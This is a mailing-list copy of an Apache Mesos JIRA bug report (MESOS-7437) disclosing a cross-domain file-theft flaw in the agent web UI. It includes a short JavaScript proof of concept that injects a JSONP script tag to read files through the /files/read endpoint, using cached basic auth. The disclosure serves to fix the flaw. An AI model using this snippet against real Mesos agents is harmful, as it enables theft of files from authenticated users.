[jira] [Created] (MESOS-7437) cross domain file-theft in the web-ui

Jacob Janco (JIRA) Fri, 28 Apr 2017 15:06:16 -0700

Jacob Janco created MESOS-7437:
----------------------------------

             Summary: cross domain file-theft in the web-ui
                 Key: MESOS-7437
                 URL: https://issues.apache.org/jira/browse/MESOS-7437
             Project: Mesos
          Issue Type: Bug
            Reporter: Jacob Janco
            Assignee: Jacob Janco
            Priority: Minor



x=document.createElement('script')
x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
document.body.appendChild(x)

The above code pasted into the web console on http://example.com/, for example, 
will yield the contents of the requested file. Basic auth is cached and resent 
in browser tabs/windows as long as the user has authenticated during the 
browser session. 



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)

[jira] [Created] (MESOS-7437) cross domain file-theft in the web-ui

Reply via email to